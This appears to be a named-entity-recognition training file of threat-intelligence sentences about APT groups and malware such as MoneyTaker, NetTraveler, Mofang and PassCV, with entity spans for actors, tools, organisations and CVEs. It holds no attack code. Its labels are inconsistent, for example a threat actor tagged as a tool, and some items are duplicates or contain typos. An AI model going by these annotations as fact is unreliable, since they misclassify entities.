{"text": "KeyBoy provides basic backdoor functionality , allowing the operators to select from various capabilities used to surveil and steal information from the victim machine .", "spans": {"TOOL: KeyBoy": [[0, 6]]}, "info": {"id": "dnrti_train_002231", "source": "dnrti_train"}}
{"text": "The first attack started in early July with a ShimRatReporter payload .", "spans": {"MALWARE: ShimRatReporter": [[46, 61]]}, "info": {"id": "dnrti_train_002232", "source": "dnrti_train"}}
{"text": "Myanmar has been the target of Mofang 's attacks for years before the campaign related to the sez .", "spans": {"THREAT_ACTOR: Mofang": [[31, 37]]}, "info": {"id": "dnrti_train_002233", "source": "dnrti_train"}}
{"text": "In late September 2015 Mofang used the website of Myanmar 's national airline hosted at www.flymna.com for an attack against an organization in Myanmar .", "spans": {"THREAT_ACTOR: Mofang": [[23, 29]]}, "info": {"id": "dnrti_train_002234", "source": "dnrti_train"}}
{"text": "In December 2012 Mofang started a campaign against a new target , called ' seg ' for the purpose of this report .", "spans": {}, "info": {"id": "dnrti_train_002235", "source": "dnrti_train"}}
{"text": "From the configuration it can be determined that the company was running F-Secure Antivirus and Mofang registered the domain to not appear suspicious .", "spans": {"TOOL: F-Secure Antivirus": [[73, 91]], "TOOL: Mofang": [[96, 102]]}, "info": {"id": "dnrti_train_002236", "source": "dnrti_train"}}
{"text": "In September 2015 Mofang launched another attack .", "spans": {"THREAT_ACTOR: Mofang": [[18, 24]]}, "info": {"id": "dnrti_train_002237", "source": "dnrti_train"}}
{"text": "A new version of ShimRat was built on the 7th of September , uploaded to the server and only days later used in a new campaign .", "spans": {"TOOL: ShimRat": [[17, 24]]}, "info": {"id": "dnrti_train_002238", "source": "dnrti_train"}}
{"text": "MoneyTaker has primarily been targeting card processing systems , including the AWS CBR ( Russian Interbank System ) and purportedly SWIFT ( US ) .", "spans": {}, "info": {"id": "dnrti_train_002239", "source": "dnrti_train"}}
{"text": "Given the wide usage of STAR in LATAM , financial institutions in LATAM could have particular exposure to a potential interest from the MoneyTaker group .", "spans": {"ORGANIZATION: financial institutions": [[40, 62]], "THREAT_ACTOR: MoneyTaker group": [[136, 152]]}, "info": {"id": "dnrti_train_002240", "source": "dnrti_train"}}
{"text": "In addition to banks , the MoneyTaker group has attacked law firms and also financial software vendors .", "spans": {"THREAT_ACTOR: MoneyTaker group": [[27, 43]], "ORGANIZATION: law firms": [[57, 66]]}, "info": {"id": "dnrti_train_002241", "source": "dnrti_train"}}
{"text": "Since that time , the group attacked companies in California , Utah , Oklahoma , Colorado , Illinois , Missouri , South Carolina , North Carolina , Virginia and Florida .", "spans": {}, "info": {"id": "dnrti_train_002242", "source": "dnrti_train"}}
{"text": "The first attack in the US that Group-IB attributes to MoneyTaker was conducted in the spring of 2016 : money was stolen from the bank by gaining access to First Data 's \" STAR \" network operator portal .", "spans": {"ORGANIZATION: Group-IB": [[32, 40]]}, "info": {"id": "dnrti_train_002243", "source": "dnrti_train"}}
{"text": "The first attack in the US that Group-IB attributes to this group was conducted in the spring of 2016 : money was stolen from the bank by gaining access to First Data 's \" STAR \" network operator portal .", "spans": {"ORGANIZATION: Group-IB": [[32, 40]]}, "info": {"id": "dnrti_train_002244", "source": "dnrti_train"}}
{"text": "In 2017 , the number of MoneyTaker 's attacks has remained the same with 8 US banks , 1 law firm and 1 bank in Russia being targeted .", "spans": {"THREAT_ACTOR: MoneyTaker": [[24, 34]], "ORGANIZATION: law firm": [[88, 96]]}, "info": {"id": "dnrti_train_002245", "source": "dnrti_train"}}
{"text": "In 2017 , the number of attacks has remained the same with 8 US banks , 1 law firm and 1 bank in Russia being targeted .", "spans": {"ORGANIZATION: law firm": [[74, 82]]}, "info": {"id": "dnrti_train_002246", "source": "dnrti_train"}}
{"text": "By analyzing the attack infrastructure , Group-IB identified that MoneyTaker group continuously exfiltrates internal banking documentation to learn about bank operations in preparation for future attacks .", "spans": {"ORGANIZATION: Group-IB": [[41, 49]], "THREAT_ACTOR: MoneyTaker group": [[66, 82]]}, "info": {"id": "dnrti_train_002247", "source": "dnrti_train"}}
{"text": "Group-IB reports that MoneyTaker uses both borrowed and their own self-written tools .", "spans": {"ORGANIZATION: Group-IB": [[0, 8]]}, "info": {"id": "dnrti_train_002248", "source": "dnrti_train"}}
{"text": "Group-IB has provided Europol and Interpol with detailed information about the MoneyTaker group for further investigative activities as part of our cooperation in fighting cybercrime .", "spans": {"ORGANIZATION: Group-IB": [[0, 8]]}, "info": {"id": "dnrti_train_002249", "source": "dnrti_train"}}
{"text": "In late September 2015 Mofang used the website of Myanmara 's national airline hosted at www.flymna.com for an attack against an organization in Myanmar .", "spans": {}, "info": {"id": "dnrti_train_002250", "source": "dnrti_train"}}
{"text": "To control the full operation , MoneyTaker uses a Pentest framework Server .", "spans": {"THREAT_ACTOR: MoneyTaker": [[32, 42]], "TOOL: Pentest framework Server": [[50, 74]]}, "info": {"id": "dnrti_train_002251", "source": "dnrti_train"}}
{"text": "On it , MoneyTaker install a legitimate tool for penetration testing – Metasploit .", "spans": {"THREAT_ACTOR: MoneyTaker": [[8, 18]], "TOOL: Metasploit": [[71, 81]]}, "info": {"id": "dnrti_train_002252", "source": "dnrti_train"}}
{"text": "At the end of June 2015 Mofang started its campaign to gather information of a specific target in relation to the sezs : the cpg Corporation .", "spans": {"ORGANIZATION: cpg Corporation": [[125, 140]]}, "info": {"id": "dnrti_train_002253", "source": "dnrti_train"}}
{"text": "MoneyTaker uses ' fileless ' malware only existing in RAM and is destroyed after reboot .", "spans": {"THREAT_ACTOR: MoneyTaker": [[0, 10]], "TOOL: fileless": [[18, 26]]}, "info": {"id": "dnrti_train_002254", "source": "dnrti_train"}}
{"text": "To ensure persistence in the system MoneyTaker relies on PowerShell and VBS scripts - they are both difficult to detect by antivirus and easy to modify .", "spans": {"THREAT_ACTOR: MoneyTaker": [[36, 46]], "TOOL: PowerShell": [[57, 67]], "TOOL: VBS scripts": [[72, 83]]}, "info": {"id": "dnrti_train_002255", "source": "dnrti_train"}}
{"text": "After successfully infecting one of the computers and gaining initial access to the system , the attackers perform reconnaissance of the local network in order to gain domain administrator privileges and eventually consolidate control over the network .", "spans": {}, "info": {"id": "dnrti_train_002256", "source": "dnrti_train"}}
{"text": "MUSTANG PANDA has previously used the observed microblogging site to host malicious PowerShell scripts and Microsoft Office documents in targeted attacks on Mongolia-focused NGOs .", "spans": {"THREAT_ACTOR: MUSTANG PANDA": [[0, 13]], "TOOL: PowerShell scripts": [[84, 102]], "TOOL: Microsoft Office documents": [[107, 133]]}, "info": {"id": "dnrti_train_002257", "source": "dnrti_train"}}
{"text": "This newly observed activity uses a series of redirections and fileless , malicious implementations of legitimate tools to gain access to the targeted systems .", "spans": {}, "info": {"id": "dnrti_train_002258", "source": "dnrti_train"}}
{"text": "Unit 42 recently identified a targeted attack against an individual working for the Foreign Ministry of Uzbekistan in China .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "ORGANIZATION: Foreign Ministry": [[84, 100]]}, "info": {"id": "dnrti_train_002259", "source": "dnrti_train"}}
{"text": "Since that time , MoneyTaker attacked companies in California , Utah , Oklahoma , Colorado , Illinois , Missouri , South Carolina , North Carolina , Virginia and Florida .", "spans": {"THREAT_ACTOR: MoneyTaker": [[18, 28]]}, "info": {"id": "dnrti_train_002260", "source": "dnrti_train"}}
{"text": "In their Operation Tropic Trooper report , Trend Micro documented the behaviour and functionality of an espionage toolkit with several design similarities to those observed in the various components of KeyBoy .", "spans": {"ORGANIZATION: Trend Micro": [[43, 54]], "MALWARE: espionage toolkit": [[104, 121]], "TOOL: KeyBoy": [[202, 208]]}, "info": {"id": "dnrti_train_002261", "source": "dnrti_train"}}
{"text": "Our analysis shows that actors attempted to exploit CVE-2012-0158 to install NetTraveler Trojan .", "spans": {"VULNERABILITY: CVE-2012-0158": [[52, 65]], "TOOL: NetTraveler Trojan": [[77, 95]]}, "info": {"id": "dnrti_train_002262", "source": "dnrti_train"}}
{"text": "Unit 42 's analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan .", "spans": {"ORGANIZATION: Unit 42": [[0, 7]], "TOOL: NetTraveler": [[31, 42]], "VULNERABILITY: CVE-2012-0158": [[64, 77]], "TOOL: NetTraveler Trojan": [[89, 107]]}, "info": {"id": "dnrti_train_002263", "source": "dnrti_train"}}
{"text": "Our analysis shows that NetTraveler attempted to exploit CVE-2012-0158 to install NetTraveler Trojan .", "spans": {"TOOL: NetTraveler": [[24, 35]], "VULNERABILITY: CVE-2012-0158": [[57, 70]], "TOOL: NetTraveler Trojan": [[82, 100]]}, "info": {"id": "dnrti_train_002264", "source": "dnrti_train"}}
{"text": "In 2016 , Group-IB identified 10 attacks conducted by MoneyTaker , 6 attacks on banks in the US , 1 attack on a US service provider , 1 attack on a bank in the UK and 2 attacks on Russian banks .", "spans": {"ORGANIZATION: Group-IB": [[10, 18]], "ORGANIZATION: service provider": [[115, 131]]}, "info": {"id": "dnrti_train_002265", "source": "dnrti_train"}}
{"text": "If KeyBoy is a single component of a larger espionage toolkit , the developers may have realized that this older , static-key based , configuration encoding algorithm was inadvertently providing a link between disparate components of their malware suite .", "spans": {"TOOL: KeyBoy": [[3, 9]], "TOOL: configuration encoding algorithm": [[134, 166]]}, "info": {"id": "dnrti_train_002266", "source": "dnrti_train"}}
{"text": "In 2016 , Group-IB identified 10 attacks conducted by MoneyTaker ; 6 attacks on banks in the US , 1 attack on a US service provider , 1 attack on a bank in the UK and 2 attacks on Russian banks .", "spans": {"ORGANIZATION: Group-IB": [[10, 18]], "ORGANIZATION: service provider": [[115, 131]]}, "info": {"id": "dnrti_train_002267", "source": "dnrti_train"}}
{"text": "The NetTraveler trojan has been known to be used in targeted cyber espionage attacks for more than a decade by nation state threat actors and continues to be used to target its victims and exfiltrate data .", "spans": {"TOOL: NetTraveler trojan": [[4, 22]]}, "info": {"id": "dnrti_train_002268", "source": "dnrti_train"}}
{"text": "The exploit document carrying this alternate KeyBoy configuration also used a decoy document which was displayed to the user after the exploit launched .", "spans": {"MALWARE: exploit document": [[4, 20]], "TOOL: KeyBoy": [[45, 51]], "MALWARE: decoy document": [[78, 92]]}, "info": {"id": "dnrti_train_002269", "source": "dnrti_train"}}
{"text": "Only one incident involving a Russian bank was promptly identified and prevented that is known to Group-IB .", "spans": {"ORGANIZATION: Group-IB": [[98, 106]]}, "info": {"id": "dnrti_train_002270", "source": "dnrti_train"}}
{"text": "This program is designed to capture keystrokes , take screenshots of the user 's desktop and get contents from the clipboard .", "spans": {}, "info": {"id": "dnrti_train_002271", "source": "dnrti_train"}}
{"text": "To conduct targeted attacks , MoneyTaker use a distributed infrastructure that is difficult to track .", "spans": {"THREAT_ACTOR: MoneyTaker": [[30, 40]], "TOOL: distributed infrastructure": [[47, 73]]}, "info": {"id": "dnrti_train_002272", "source": "dnrti_train"}}
{"text": "This technique hides the true C2 server from researchers that do not have access to both the rastls.dll and Sycmentec.config files .", "spans": {"MALWARE: rastls.dll": [[93, 103]], "MALWARE: Sycmentec.config files": [[108, 130]]}, "info": {"id": "dnrti_train_002273", "source": "dnrti_train"}}
{"text": "Hackers use Metasploit to conduct all these activities : network reconnaissance , search for vulnerable applications , exploit vulnerabilities , escalate systems privileges , and collect information .", "spans": {"TOOL: Metasploit": [[12, 22]]}, "info": {"id": "dnrti_train_002274", "source": "dnrti_train"}}
{"text": "Over the years they've used application components from Norman , McAfee and Norton .", "spans": {"ORGANIZATION: Norman": [[56, 62]], "ORGANIZATION: McAfee": [[65, 71]], "ORGANIZATION: Norton": [[76, 82]]}, "info": {"id": "dnrti_train_002275", "source": "dnrti_train"}}
{"text": "Recently , Falcon Intelligence observed new activity from MUSTANG PANDA , using a unique infection chain to target likely Mongolia-based victims .", "spans": {"ORGANIZATION: Falcon Intelligence": [[11, 30]], "TOOL: infection chain": [[89, 104]]}, "info": {"id": "dnrti_train_002276", "source": "dnrti_train"}}
{"text": "Throughout the years , the Mofang group has compromised countless servers belonging to government or other Myanmar related organizations , in order to stage attacks .", "spans": {}, "info": {"id": "dnrti_train_002277", "source": "dnrti_train"}}
{"text": "A report published by Kaspersky Labs in 2011 on NetTraveler also mentions the C2 servers were being hosted by Krypt Technolgies .", "spans": {"ORGANIZATION: Kaspersky Labs": [[22, 36]], "TOOL: NetTraveler": [[48, 59]]}, "info": {"id": "dnrti_train_002279", "source": "dnrti_train"}}
{"text": "Obviously , the developers behind NetTraveler have taken steps to try to hide the malware 's configuration .", "spans": {"TOOL: NetTraveler": [[34, 45]]}, "info": {"id": "dnrti_train_002280", "source": "dnrti_train"}}
{"text": "In this report , we'll review how the actors attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan .", "spans": {"VULNERABILITY: CVE-2012-0158": [[66, 79]], "TOOL: NetTraveler Trojan": [[95, 113]]}, "info": {"id": "dnrti_train_002281", "source": "dnrti_train"}}
{"text": "In this report , we'll review how NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan .", "spans": {"TOOL: NetTraveler": [[34, 45]], "VULNERABILITY: CVE-2012-0158": [[67, 80]], "TOOL: NetTraveler Trojan": [[96, 114]]}, "info": {"id": "dnrti_train_002282", "source": "dnrti_train"}}
{"text": "In this report , we'll review how the NetTraveler attempted to exploit CVE-2012-0158 to install the NetTraveler Trojan .", "spans": {"TOOL: NetTraveler": [[38, 49]], "VULNERABILITY: CVE-2012-0158": [[71, 84]], "TOOL: NetTraveler Trojan": [[100, 118]]}, "info": {"id": "dnrti_train_002283", "source": "dnrti_train"}}
{"text": "NetTraveler has been used to target diplomats , embassies and government institutions for over a decade , and remains the tool of choice by the adversaries behind these cyber espionage campaigns .", "spans": {"TOOL: NetTraveler": [[0, 11]], "ORGANIZATION: diplomats": [[36, 45]], "ORGANIZATION: embassies": [[48, 57]], "ORGANIZATION: government institutions": [[62, 85]]}, "info": {"id": "dnrti_train_002285", "source": "dnrti_train"}}
{"text": "WildFire correctly classifies NetTraveler as malicious .", "spans": {"ORGANIZATION: WildFire": [[0, 8]], "TOOL: NetTraveler": [[30, 41]]}, "info": {"id": "dnrti_train_002286", "source": "dnrti_train"}}
{"text": "The NetTraveler group has infected victims across multiple establishments in both the public and private sector including government institutions , embassies , the oil and gas industry , research centers , military contractors and activists .", "spans": {"ORGANIZATION: government institutions": [[122, 145]], "ORGANIZATION: embassies": [[148, 157]], "ORGANIZATION: military contractors": [[206, 226]], "ORGANIZATION: activists": [[231, 240]]}, "info": {"id": "dnrti_train_002287", "source": "dnrti_train"}}
{"text": "Today Kaspersky Lab 's team of experts published a new research report about NetTraveler , which is a family of malicious programs used by APT actors to successfully compromise more than 350 high-profile victims in 40 countries .", "spans": {"ORGANIZATION: Kaspersky Lab": [[6, 19]], "TOOL: NetTraveler": [[77, 88]]}, "info": {"id": "dnrti_train_002288", "source": "dnrti_train"}}
{"text": "According to Kaspersky Lab 's report , this threat actor has been active since as early as 2004 ; however , the highest volume of activity occurred from 2010 – 2013 .", "spans": {"ORGANIZATION: Kaspersky Lab": [[13, 26]]}, "info": {"id": "dnrti_train_002289", "source": "dnrti_train"}}
{"text": "Most recently , the NetTraveler group 's main domains of interest for cyberespionage activities include space exploration , nanotechnology , energy production , nuclear power , lasers , medicine and communications .", "spans": {}, "info": {"id": "dnrti_train_002290", "source": "dnrti_train"}}
{"text": "In addition , the NetTraveler toolkit was able to install additional info-stealing malware as a backdoor , and it could be customized to steal other types of sensitive information such as configuration details for an application or computer-aided design files .", "spans": {"TOOL: NetTraveler toolkit": [[18, 37]]}, "info": {"id": "dnrti_train_002291", "source": "dnrti_train"}}
{"text": "During Kaspersky Lab 's analysis of NetTraveler , the company 's experts identified six victims that had been infected by both NetTraveler and Red October , which was another cyberespionage operation analyzed by Kaspersky Lab in January 2013 .", "spans": {"ORGANIZATION: Kaspersky Lab": [[7, 20], [212, 225]], "TOOL: NetTraveler": [[36, 47]]}, "info": {"id": "dnrti_train_002292", "source": "dnrti_train"}}
{"text": "Kaspersky Lab 's products detect and neutralize the malicious programs and its variants used by the NetTraveler Toolkit , including Trojan-Spy.Win32.TravNet and Downloader.Win32.NetTraveler .", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 13]], "TOOL: NetTraveler Toolkit": [[100, 119]], "TOOL: Trojan-Spy.Win32.TravNet": [[132, 156]], "TOOL: Downloader.Win32.NetTraveler": [[161, 189]]}, "info": {"id": "dnrti_train_002293", "source": "dnrti_train"}}
{"text": "Based on Kaspersky Lab 's analysis of NetTraveler 's C&C data , there were a total of 350 victims in 40 countries across including the United States , Canada , United Kingdom , Russia , Chile , Morocco , Greece , Belgium , Austria , Ukraine , Lithuania , Belarus , Australia , Hong Kong , Japan , China , Mongolia , Iran , Turkey , India , Pakistan , South Korea , Thailand , Qatar , Kazakhstan , and Jordan .", "spans": {"ORGANIZATION: Kaspersky Lab": [[9, 22]]}, "info": {"id": "dnrti_train_002294", "source": "dnrti_train"}}
{"text": "In this case , it was a group commonly referred to as \" Nitro \" , which was coined by Symantec in its 2011 whitepaper .", "spans": {"ORGANIZATION: Symantec": [[86, 94]]}, "info": {"id": "dnrti_train_002296", "source": "dnrti_train"}}
{"text": "Historically , Nitro is known for targeted spear phishing campaigns and using Poison Ivy malware , which was not seen in these attacks .", "spans": {"TOOL: Poison Ivy malware": [[78, 96]]}, "info": {"id": "dnrti_train_002297", "source": "dnrti_train"}}
{"text": "Since at least 2013 , Nitro appears to have somewhat modified their malware and delivery methods to include Spindest and legitimate compromised websites , as reported by Cyber Squared 's TCIRT .", "spans": {"TOOL: Spindest": [[108, 116]], "TOOL: legitimate compromised websites": [[121, 152]], "ORGANIZATION: Cyber Squared 's TCIRT": [[170, 192]]}, "info": {"id": "dnrti_train_002298", "source": "dnrti_train"}}
{"text": "In July , Nitro compromised a South Korean clothing and accessories manufacturer 's website to serve malware commonly referred to as \" Spindest \" .", "spans": {"TOOL: Spindest": [[135, 143]]}, "info": {"id": "dnrti_train_002299", "source": "dnrti_train"}}
{"text": "Of all the samples we've tied to this activity so far noted in this blog , this is the only one configured to connect directly to an IP address for Command and Control ( C2 ) .", "spans": {}, "info": {"id": "dnrti_train_002300", "source": "dnrti_train"}}
{"text": "The next sample was another Spindest variant and had the same timestamp as the aforementioned PcClient sample .", "spans": {"TOOL: Spindest": [[28, 36]], "TOOL: PcClient sample": [[94, 109]]}, "info": {"id": "dnrti_train_002301", "source": "dnrti_train"}}
{"text": "As this post and previous cited research show , APT groups such as Nitro will continue to evolve their techniques within the kill chain to avoid detection .", "spans": {}, "info": {"id": "dnrti_train_002302", "source": "dnrti_train"}}
{"text": "They then moved on to the motor industry in late May .", "spans": {}, "info": {"id": "dnrti_train_002307", "source": "dnrti_train"}}
{"text": "From late April to early May , the attackers focused on human rights related NGOs .", "spans": {}, "info": {"id": "dnrti_train_002308", "source": "dnrti_train"}}
{"text": "Attackers then moved on to the motor industry in late May .", "spans": {}, "info": {"id": "dnrti_train_002309", "source": "dnrti_train"}}
{"text": "At this point , the current attack campaign against the chemical industry began .", "spans": {}, "info": {"id": "dnrti_train_002310", "source": "dnrti_train"}}
{"text": "The attacks were traced back to a computer system that was a virtual private server ( VPS ) located in the United States .", "spans": {"TOOL: VPS": [[86, 89]]}, "info": {"id": "dnrti_train_002315", "source": "dnrti_train"}}
{"text": "Nitro 's campaign focused on the chemical sector with the goal of obtaining sensitive documents such as proprietary designs , formulas , and manufacturing processes .", "spans": {"THREAT_ACTOR: Nitro": [[0, 5]], "ORGANIZATION: chemical sector": [[33, 48]]}, "info": {"id": "dnrti_train_002321", "source": "dnrti_train"}}
{"text": "These have been highly active in the Middle East region and unveiled ongoing targeted attacks in multiple regions .", "spans": {}, "info": {"id": "dnrti_train_002323", "source": "dnrti_train"}}
{"text": "The attackers try to lure targets through spear phishing emails that include compressed executables .", "spans": {}, "info": {"id": "dnrti_train_002324", "source": "dnrti_train"}}
{"text": "We found that the group behind this campaign targeted mainly industrial , engineering and manufacturing organizations in more than 30 countries .", "spans": {"ORGANIZATION: manufacturing organizations": [[90, 117]]}, "info": {"id": "dnrti_train_002325", "source": "dnrti_train"}}
{"text": "Using the Kaspersky Security Network ( KSN ) and artifacts from malware files and attack sites , we were able to trace the attacks back to March 2015 .", "spans": {"ORGANIZATION: Kaspersky Security Network": [[10, 36]], "ORGANIZATION: KSN": [[39, 42]]}, "info": {"id": "dnrti_train_002326", "source": "dnrti_train"}}
{"text": "Operation Ghoul is one of the many attacks in the wild targeting industrial , manufacturing and engineering organizations , Kaspersky Lab recommends users to be extra cautious while checking and opening emails and attachments .", "spans": {"ORGANIZATION: engineering organizations": [[96, 121]], "ORGANIZATION: Kaspersky Lab": [[124, 137]]}, "info": {"id": "dnrti_train_002327", "source": "dnrti_train"}}
{"text": "The main point that sets Operation Groundbait apart from the other attacks is that it has mostly been targeting anti-government separatists in the self-declared Donetsk and Luhansk People's Republics .", "spans": {"ORGANIZATION: anti-government separatists": [[112, 139]]}, "info": {"id": "dnrti_train_002328", "source": "dnrti_train"}}
{"text": "The attacks appear to be geopolitically motivated and target high profile organizations .", "spans": {"ORGANIZATION: high profile organizations": [[61, 87]]}, "info": {"id": "dnrti_train_002329", "source": "dnrti_train"}}
{"text": "The objective of the attacks is clearly espionage – they involve gaining access to top legislative , executive and judicial bodies around the world .", "spans": {}, "info": {"id": "dnrti_train_002330", "source": "dnrti_train"}}
{"text": "The attackers have targeted a large number of organizations globally since early 2017 , with the main focus on the Middle East and North Africa ( MENA ) , especially Palestine .", "spans": {}, "info": {"id": "dnrti_train_002331", "source": "dnrti_train"}}
{"text": "The attacks were initially discovered while investigating a phishing attack that targeted political figures in the MENA region .", "spans": {}, "info": {"id": "dnrti_train_002332", "source": "dnrti_train"}}
{"text": "Like BlackEnergy ( a.k.a Sandworm , Quedagh ) , Potao is an example of targeted espionage ( APT ) malware detected mostly in Ukraine and a number of other CIS countries , including Russia , Georgia and Belarus .", "spans": {"TOOL: BlackEnergy": [[5, 16]], "THREAT_ACTOR: Sandworm": [[25, 33]], "THREAT_ACTOR: Quedagh": [[36, 43]], "TOOL: Potao": [[48, 53]]}, "info": {"id": "dnrti_train_002333", "source": "dnrti_train"}}
{"text": "The main reason for the increase in Potao detections in 2014 and 2015 were infections through USB drives .", "spans": {"TOOL: Potao": [[36, 41]]}, "info": {"id": "dnrti_train_002334", "source": "dnrti_train"}}
{"text": "The first Potao campaign that we examined took place in August 2011 .", "spans": {}, "info": {"id": "dnrti_train_002335", "source": "dnrti_train"}}
{"text": "In March 2014 , the gang behind Potao started using a new infection vector .", "spans": {"TOOL: Potao": [[32, 37]], "TOOL: infection vector": [[58, 74]]}, "info": {"id": "dnrti_train_002336", "source": "dnrti_train"}}
{"text": "Since March 2015 , ESET has detected Potao binaries at several high-value Ukrainian targets that include government and military entities and one of the major Ukrainian news agencies .", "spans": {"ORGANIZATION: ESET": [[19, 23]], "TOOL: Potao": [[37, 42]], "ORGANIZATION: military entities": [[120, 137]], "ORGANIZATION: news agencies": [[169, 182]]}, "info": {"id": "dnrti_train_002337", "source": "dnrti_train"}}
{"text": "As confirmation that the malware writers are still very active even at the time of this writing , ESET detected a new Potao sample compiled on July 20 , 2015 .", "spans": {"ORGANIZATION: ESET": [[98, 102]], "TOOL: Potao sample": [[118, 130]]}, "info": {"id": "dnrti_train_002338", "source": "dnrti_train"}}
{"text": "In the previous pages we have presented our findings based on ESET detection telemetry and our analysis of Win32/Potao and Win32/FakeTC samples .", "spans": {"ORGANIZATION: ESET": [[62, 66]], "TOOL: Win32/Potao": [[107, 118]], "TOOL: Win32/FakeTC samples": [[123, 143]]}, "info": {"id": "dnrti_train_002339", "source": "dnrti_train"}}
{"text": "Potao is another example of targeted espionage malware , a so-called APT , to use the popular buzzword , although technically the malware is not particularly advanced or sophisticated .", "spans": {"TOOL: Potao": [[0, 5]], "TOOL: malware": [[130, 137]]}, "info": {"id": "dnrti_train_002340", "source": "dnrti_train"}}
{"text": "Examples of notable Potao dissemination techniques , some of which were previously unseen , or at least relatively uncommon , include the use of highly-targeted spear-phishing SMS messages to drive potential victims to malware download sites and USB worm functionality that tricked the user into ' willingly ' executing the trojan .", "spans": {"TOOL: Potao": [[20, 25]]}, "info": {"id": "dnrti_train_002341", "source": "dnrti_train"}}
{"text": "The PassCV group continues to be one of the most successful and active threat groups that leverage a wide array of stolen Authenticode-signing certificates .", "spans": {"THREAT_ACTOR: PassCV group": [[4, 16]]}, "info": {"id": "dnrti_train_002342", "source": "dnrti_train"}}
{"text": "The PassCV group typically utilized publicly available RATs in addition to some custom code , which ultimately provided backdoor functionality to affected systems via phony resumes and curriculum vitae ( CVs ) .", "spans": {"THREAT_ACTOR: PassCV group": [[4, 16]], "TOOL: publicly available RATs": [[36, 59]]}, "info": {"id": "dnrti_train_002343", "source": "dnrti_train"}}
{"text": "he PassCV group typically utilized publicly available RATs in addition to some custom code , which ultimately provided backdoor functionality to affected systems via phony resumes and curriculum vitae ( CVs ) .", "spans": {"THREAT_ACTOR: PassCV": [[3, 9]], "TOOL: publicly available RATs": [[35, 58]]}, "info": {"id": "dnrti_train_002344", "source": "dnrti_train"}}
{"text": "PassCV continues to maintain a heavy reliance on obfuscated and signed versions of older RATs like ZxShell and Ghost RAT , which have remained a favorite of the wider Chinese criminal community since their initial public release .", "spans": {"THREAT_ACTOR: PassCV": [[0, 6]], "TOOL: RATs": [[89, 93]], "TOOL: ZxShell": [[99, 106]], "TOOL: Ghost RAT": [[111, 120]]}, "info": {"id": "dnrti_train_002345", "source": "dnrti_train"}}
{"text": "SPEAR identified recent PassCV samples which implemented another commercial off-the-shelf ( COTS ) RAT called Netwire .", "spans": {"ORGANIZATION: SPEAR": [[0, 5]], "TOOL: PassCV samples": [[24, 38]], "TOOL: RAT": [[99, 102]], "TOOL: Netwire": [[110, 117]]}, "info": {"id": "dnrti_train_002346", "source": "dnrti_train"}}
{"text": "The first new connection SPEAR identified was derived from an email address listed in Blue Coat Systems' original report on PassCV .", "spans": {"ORGANIZATION: SPEAR": [[25, 30]], "THREAT_ACTOR: PassCV": [[124, 130]]}, "info": {"id": "dnrti_train_002348", "source": "dnrti_train"}}
{"text": "Syncopate is a well-known Russian company that is best known as the developer and operator of the ' GameNet ' platform .", "spans": {"ORGANIZATION: company": [[34, 41]]}, "info": {"id": "dnrti_train_002349", "source": "dnrti_train"}}
{"text": "The PassCV group continues to be extremely effective in compromising both small and large game companies and surreptitiously using their code-signing certificates to infect an even larger swath of organizations .", "spans": {"THREAT_ACTOR: PassCV": [[4, 10]], "ORGANIZATION: game companies": [[90, 104]]}, "info": {"id": "dnrti_train_002350", "source": "dnrti_train"}}
{"text": "Since the last report , PassCV has significantly expanded its targets to include victims in the United States , Taiwan , China and Russia .", "spans": {"THREAT_ACTOR: PassCV": [[24, 30]]}, "info": {"id": "dnrti_train_002351", "source": "dnrti_train"}}
{"text": "Based on data collected from Palo Alto Networks AutoFocus threat intelligence , we discovered continued operations of activity very similar to the Roaming Tiger attack campaign that began in the August 2015 timeframe , with a concentration of attacks in late October and continuing into December .", "spans": {"ORGANIZATION: Palo Alto Networks AutoFocus": [[29, 57]]}, "info": {"id": "dnrti_train_002352", "source": "dnrti_train"}}
{"text": "BBSRAT is typically packaged within a portable executable file , although in a few of the observed instances , a raw DLL was discovered to contain BBSRAT .", "spans": {"TOOL: BBSRAT": [[0, 6], [147, 153]]}, "info": {"id": "dnrti_train_002354", "source": "dnrti_train"}}
{"text": "WildFire properly classifies BBSRAT malware samples as malicious .", "spans": {"ORGANIZATION: WildFire": [[0, 8]], "TOOL: BBSRAT malware samples": [[29, 51]]}, "info": {"id": "dnrti_train_002355", "source": "dnrti_train"}}
{"text": "This week we will discuss another Chinese nexus adversary we call Samurai Panda .", "spans": {}, "info": {"id": "dnrti_train_002356", "source": "dnrti_train"}}
{"text": "Samurai Panda is interesting in that their target selection tends to focus on Asia Pacific victims in Japan , the Republic of Korea , and other democratic Asian victims .", "spans": {"THREAT_ACTOR: Samurai Panda": [[0, 13]]}, "info": {"id": "dnrti_train_002357", "source": "dnrti_train"}}
{"text": "Next , in an effort to demonstrate it wasn't relegated to China , CrowdStrike exposed Clever Kitten , an actor we track out of Iran who leverages some very distinct TTPs when viewed next to a more visible adversary .", "spans": {"ORGANIZATION: CrowdStrike": [[66, 77]]}, "info": {"id": "dnrti_train_002358", "source": "dnrti_train"}}
{"text": "Next , in an effort to demonstrate it wasn't relegated to China , we exposed Clever Kitten , an actor we track out of Iran who leverages some very distinct TTPs when viewed next to a more visible adversary .", "spans": {}, "info": {"id": "dnrti_train_002359", "source": "dnrti_train"}}
{"text": "Beginning in 2009 , we've observed this actor conduct more than 40 unique campaigns that we've identified in the malware configurations' campaign codes .", "spans": {}, "info": {"id": "dnrti_train_002360", "source": "dnrti_train"}}
{"text": "These codes are often leveraged in the malware used by coordinated targeted attackers to differentiate victims that were successfully compromised from different target sets .", "spans": {}, "info": {"id": "dnrti_train_002361", "source": "dnrti_train"}}
{"text": "When conducting programmatic espionage activity , it can presumably become quite confusing if the attacker targets a heavy industry company , an avionics program , and seven other unique targets as to which infected host you will collect what information from .", "spans": {"ORGANIZATION: heavy industry company": [[117, 139]]}, "info": {"id": "dnrti_train_002362", "source": "dnrti_train"}}
{"text": "These rules detect the malware \" beaconing \" to the command-and-control server , the initial malware check-in , and an attempt to download a backdoor module .", "spans": {"TOOL: beaconing": [[33, 42]], "TOOL: command-and-control server": [[52, 78]]}, "info": {"id": "dnrti_train_002363", "source": "dnrti_train"}}
